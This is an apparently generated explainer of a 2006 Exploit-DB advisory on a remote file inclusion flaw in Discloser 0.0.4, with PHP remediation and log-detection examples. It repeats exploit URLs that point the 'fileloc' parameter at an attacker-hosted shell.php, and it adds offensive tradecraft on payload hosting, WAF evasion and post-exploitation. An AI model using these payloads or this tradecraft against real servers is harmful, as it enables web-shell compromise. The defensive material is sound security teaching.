Discloser 0.0.4 'fileloc' Remote File Inclusion Explained

What this paper is
This paper describes a Remote File Inclusion (RFI) vulnerability found in Discloser version 0.0.4. RFI vulnerabilities allow an attacker to trick a web application into including and executing code fetched from a server the attacker controls, rather than a local file. In this case the fileloc parameter of two Discloser scripts, content/content.php and inc/indexhead.php, is susceptible to this attack.
Simple technical breakdown
Discloser is a PHP web application. PHP allows one file to pull the contents of another into the running script with include, require and their _once variants. When a web application places user-supplied input (such as a URL parameter) directly into one of these statements without validation, an attacker can supply a URL instead of a file name. If the PHP configuration permits URLs in include statements (allow_url_fopen on PHP releases before 5.2, allow_url_include on 5.2 and later), the vulnerable script fetches the remote file over HTTP and executes whatever it receives, which hands the attacker code execution in the web server's context.
The vulnerability lies in how the fileloc parameter is handled. If the application does not check that fileloc refers to one of its own local files rather than a remote URL, it can be exploited.
Complete code and payload walkthrough
The provided paper snippet does not contain any actual code or payload bytes. It only describes the vulnerability and provides example exploit URLs.
Here's a breakdown of the exploit URL structure:
The paper lists two exploit URLs, one per vulnerable script ([Target] and [Path] are placeholders):
http://[Target]/[Path]/content/content.php?fileloc=http://www.evalsite.com/shell.php?
http://[Target]/[Path]/inc/indexhead.php?fileloc=http://www.evalsite.com/shell.php?
Explanation of the exploit URL components:
- http://[Target]/[Path]/: The vulnerable Discloser installation. [Target] is the IP address or hostname of the victim server; [Path] is the directory on the web server where Discloser is installed.
- content/content.php and inc/indexhead.php: The two scripts the paper names as vulnerable. The paper does not show their source; the behaviour it describes is consistent with each passing the fileloc value to an include or require statement without validation.
- ?fileloc=: The parameter being exploited. The application expects a reference to one of its own local files here.
- http://www.evalsite.com/shell.php?: The attacker-controlled URL. www.evalsite.com is the attacker's hosting server and shell.php is the PHP file it serves, typically a web shell.
- The trailing ?: If the vulnerable script appends anything to fileloc before including it (a file extension or a path suffix is the usual case), the appended text becomes part of the query string of the attacker's URL instead of changing the file name, so the target still fetches shell.php. If the script includes fileloc unchanged, the ? is harmless.
Mapping:
- fileloc parameter -> Input point for the RFI vulnerability.
- http://www.evalsite.com/shell.php? -> Remote URL containing the attacker's payload.
- content.php / indexhead.php -> Vulnerable PHP scripts that process the fileloc parameter.
Shellcode/Payload: The paper does not provide a payload. In a typical RFI attack of this nature, shell.php contains PHP code that creates a web shell, which lets the attacker run arbitrary commands on the server through a web interface. The target fetches the file over HTTP and executes whatever it receives, so the attacker's server must return the raw PHP source rather than execute it; such payloads are therefore usually hosted under a non-PHP extension (for example .txt) or on a server that does not run PHP.
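The paper carries no source, so the following is an added example (not Discloser's code and not from the advisory) that reconstructs the include pattern an RFI like this needs as a hypothetical handler, shows what the trailing ? does to an appended suffix, and sets the allow-list form beside it. The function names, the appended '.php' suffix and the allow-list entries are assumptions made for illustration.

```php
<?php
// Added example, not Discloser's code: the paper gives only the exploit URLs,
// so the vulnerable handler below is a hypothetical reconstruction of the
// include pattern an RFI like this needs. Function names, the '.php' suffix
// and the allow-list entries are assumptions for illustration.

// Hypothetical vulnerable sink. Many 2006-era PHP apps appended a fixed suffix
// to a user-supplied page name before including it; this returns the string
// that include() would be handed. With allow_url_include=On (or, before
// PHP 5.2, allow_url_fopen=On) a URL here is fetched over HTTP and executed.
function vulnerable_include_target(string $fileloc, string $suffix = '.php'): string
{
    return $fileloc . $suffix;
}

// True when include() would resolve the target through a stream wrapper
// (http://, ftp://, php://, data: ...) instead of the local filesystem.
function is_wrapper_target(string $target): bool
{
    return (bool) preg_match('#^[a-z][a-z0-9+.\-]*:#i', $target);
}

// Hardened sink: the user value selects an entry from an allow-list the
// application owns; the raw string never reaches include(). Unknown keys
// yield null, which the caller must treat as "include nothing".
function safe_include_target(string $fileloc): ?string
{
    $allowed = [                        // assumed page names, not Discloser's
        'news'  => __DIR__ . '/pages/news.php',
        'about' => __DIR__ . '/pages/about.php',
    ];
    return $allowed[$fileloc] ?? null;
}

// The fileloc value from the advisory, including its trailing "?".
$payload = 'http://www.evalsite.com/shell.php?';

// The appended ".php" lands in the query string of the attacker's URL, so the
// attacker's server still serves shell.php. That is what the trailing "?" is for.
$target = vulnerable_include_target($payload);
echo "vulnerable sink would include: $target\n";
echo 'resolved through a stream wrapper: ', is_wrapper_target($target) ? 'yes' : 'no', "\n";

// The same payload against the allow-list resolver is simply not a known key,
// and a legitimate page name maps to a path the application chose itself.
var_dump(safe_include_target($payload));
var_dump(safe_include_target('news'));
```

Run it with the PHP CLI (php example.php). The hardened resolver deliberately avoids "sanitising" the string (stripping http://, rejecting ../) because every such filter has been bypassed at some point; mapping a key to a fixed path leaves nothing to bypass.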
Practical details for offensive operations teams
- Required Access Level: Network access to the target web server is required; no local access or privileges on the target are needed initially. The target itself must also be able to make outbound HTTP requests to the attacker's hosting server, since it is the target that fetches shell.php.
- Lab Preconditions:
  - A controlled web server, reachable from the target, to host the shell.php payload.
  - A Discloser 0.0.4 installation (or a similarly vulnerable version) for testing and reconnaissance.
  - Knowledge of the target web server's directory structure to locate the Discloser installation and the vulnerable paths.
- Tooling Assumptions:
  - A web browser or curl for crafting and sending requests.
  - A simple HTTP server (e.g. Python's http.server, SimpleHTTPServer on Python 2, or Apache) to host the shell.php payload.
  - A text editor for creating the shell.php file.
  - Network scanning tools (e.g. Nmap) to identify web servers and potential Discloser installations.
- Execution Pitfalls:
  - Firewall/WAF Blocking: The target's firewall or Web Application Firewall (WAF) might block outbound requests to external URLs or recognise a URL in the fileloc parameter as an RFI pattern.
  - PHP Configuration: Remote includes only work when the target's PHP permits them. On PHP 5.2 and later that requires allow_url_include=On (default Off, deprecated as of 7.4); on the PHP 4.x/5.0/5.1 builds common when this was published, allow_url_fopen=On was sufficient, and it was on by default.
  - Path Guessing: The attacker needs to identify the [Path] to the Discloser installation.
  - Payload Detection: Antivirus or intrusion detection systems on the target might flag the web shell code once it is fetched or executed.
  - URL Encoding: Special characters in the fileloc value may need percent-encoding.
  - Null Bytes: On PHP before 5.3.4, a %00 in the parameter truncated the path and was the standard way to defeat an appended suffix in local file inclusion. For RFI the trailing ? already absorbs the suffix, so null bytes are rarely needed.
- Tradecraft Considerations:
  - Reconnaissance: Thoroughly scan the target for web applications and identify potential Discloser installations. Look for common installation paths.
  - Payload Hosting: Serve shell.php as raw PHP source (for example under a .txt name or from a server without PHP) so that it executes on the target rather than on the hosting server. A domain that does not look suspicious reduces the chance of the outbound request being flagged.
  - Obfuscation: If the WAF is aggressive, basic obfuscation of the shell.php content may help, though the paper does not discuss it.
  - Post-Exploitation: Once a web shell is achieved, focus on privilege escalation and lateral movement if permitted by the engagement scope.
Where this was used and when
This vulnerability was disclosed on 2006-08-15. At that time PHP web applications were prevalent, allow_url_fopen was on by default, and RFI was a common and effective attack vector. Discloser was a small open-source PHP application distributed through SourceForge (the paper's download link points there); the paper does not describe what it does. Exploits of this nature were found in many PHP applications and CMS platforms during this era.
Defensive lessons for modern teams
- Input Validation is Crucial: Never trust user input. Always validate and sanitize any data that is used in file operations, database queries, or system commands.
- Disable allow_url_include: It has defaulted to Off since it was introduced in PHP 5.2 and is deprecated as of PHP 7.4; keep it Off. allow_url_fopen is needed by many applications for legitimate outbound requests, so disable it only where that is not the case; otherwise make sure no user input can reach include or require.
- Use Allow-listing: Instead of trying to block bad inputs, define what good inputs look like. For file inclusions, map the user-supplied value to a fixed list of allowed local files and include nothing when there is no match.
- Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common RFI patterns. Keep WAF rules updated.
- Regular Patching and Updates: Ensure all web applications and their dependencies (like PHP itself) are kept up-to-date with the latest security patches.
- Secure Coding Practices: Train developers on secure coding principles, including the dangers of insecure file handling and the importance of input validation.
- Least Privilege: Run web servers and applications with the minimum necessary privileges to limit the impact of a successful compromise.
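As an added example for the detection and configuration points above (not code from the paper or from Discloser): a PHP CLI script that scans access-log lines for fileloc values that name a stream wrapper rather than a local page, and reports the php.ini directives that make remote includes possible. The log lines, client addresses, hostnames and paths are constructed for this example.

```php
<?php
// Added example, not from the paper: detection of RFI attempts against a
// "fileloc"-style parameter in web server access logs, plus a check of the
// php.ini directives that make the attack possible. The log lines below are
// constructed for this example; hosts, paths and addresses are placeholders.

$accessLog = <<<'LOG'
203.0.113.7 - - [15/Aug/2006:10:12:01 +0000] "GET /discloser/content/content.php?fileloc=http://www.evalsite.com/shell.php? HTTP/1.1" 200 512
203.0.113.7 - - [15/Aug/2006:10:12:05 +0000] "GET /discloser/inc/indexhead.php?fileloc=%68%74%74%70://www.evalsite.com/shell.php%3F HTTP/1.1" 200 498
198.51.100.2 - - [15/Aug/2006:10:13:10 +0000] "GET /discloser/content/content.php?fileloc=news HTTP/1.1" 200 2048
198.51.100.9 - - [15/Aug/2006:10:14:44 +0000] "GET /discloser/content/content.php?fileloc=php://input HTTP/1.1" 200 300
LOG;

// Returns one finding per request whose $param value starts with a scheme
// (http://, ftp://, php://, data: ...), i.e. would go through a stream wrapper
// if it ever reached include(). Percent-encoded values are decoded first, so
// the second line above is caught even though "http" is encoded.
function find_rfi_attempts(string $log, string $param = 'fileloc'): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        // Apache/nginx combined format: client, ident, user, [timestamp], "METHOD target HTTP/x"
        if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"/', $line, $m)) {
            continue;
        }
        [, $client, $when, $method, $target] = $m;
        $qpos = strpos($target, '?');          // split on the first "?" only:
        if ($qpos === false) {                 // later "?" belong to the value
            continue;
        }
        parse_str(substr($target, $qpos + 1), $params);   // also percent-decodes
        $value = $params[$param] ?? null;
        if (!is_string($value)) {
            continue;
        }
        if (preg_match('#^\s*[a-z][a-z0-9+.\-]*:#i', $value)) {
            $hits[] = [
                'client' => $client,
                'time'   => $when,
                'method' => $method,
                'path'   => substr($target, 0, $qpos),
                'value'  => $value,
            ];
        }
    }
    return $hits;
}

// Reports the directives that let a URL reach include()/require().
// allow_url_include exists since PHP 5.2, defaults to Off and is deprecated in
// 7.4; before 5.2 only allow_url_fopen controlled remote includes.
function audit_rfi_settings(): array
{
    $findings = [];
    if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
        $findings[] = 'allow_url_include is On: include()/require() accept URLs';
    }
    if (filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN)) {
        $findings[] = 'allow_url_fopen is On: file functions accept URLs (needed only if the app fetches remote resources)';
    }
    return $findings;
}

foreach (find_rfi_attempts($accessLog) as $hit) {
    printf("%s %s %s %s fileloc=%s\n",
        $hit['time'], $hit['client'], $hit['method'], $hit['path'], $hit['value']);
}
foreach (audit_rfi_settings() as $finding) {
    echo "config: $finding\n";
}
```

Three of the four constructed lines should be reported (the two evalsite.com requests and the php://input one); the plain page name is not. Run the script under the same PHP build as the web application so that the ini check reflects the configuration actually in force, and feed it a real log with php find_rfi.php instead of the embedded sample when using it in practice.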
ASCII visual (if applicable)
This vulnerability is a direct interaction between the web server and an external resource, so a simple flow diagram is applicable.
+-----------------+        +------------------------+        +---------------------+
| Attacker's      | -----> | Target Web Server      | -----> | Attacker's          |
| Browser         |        | (Vulnerable Discloser) |        | Hosting Server      |
+-----------------+        +------------------------+        +---------------------+
        |                              |                               |
        | 1. GET .../content.php       | 2. include() fetches          |
        |    ?fileloc=http://...       |    http://.../shell.php?      |
        |                              |                               |
        |                              | 3. Target executes the        |
        |                              |    returned PHP (web shell)   |
        |                              |                               |
        | 4. Response (shell output)   |                               |
        |<-----------------------------|                               |
        |                              |                               |
Source references
- Paper ID: 2188
- Paper Title: Discloser 0.0.4 - 'fileloc' Remote File Inclusion
- Author: Arash RJ
- Published: 2006-08-15
- Keywords: PHP, webapps
- Paper URL: https://www.exploit-db.com/papers/2188
- Raw URL: https://www.exploit-db.com/raw/2188
Original Exploit-DB Content (Verbatim)
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
| discloser 0.0.4 Remote File Inclusion Vulnerability
|
| Download: http://optusnet.dl.sourceforge.net/sourceforge/discloser/discloser-0.0.4.tar.gz
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|Contact|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
| Discoverd by: Arash RJ
|
| Team: PersianFox Digital Security Team
|
| URL: http://www.PersianFox.com
|
| E-Mail: arashrj@gmail.com
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|Exploit|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
| http://[Target]/[Path]/content/content.php?fileloc=http://www.evalsite.com/shell.php?
|
| http://[Target]/[Path]/inc/indexhead.php?fileloc= http://www.evalsite.com/shell.php?
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
# milw0rm.com [2006-08-15]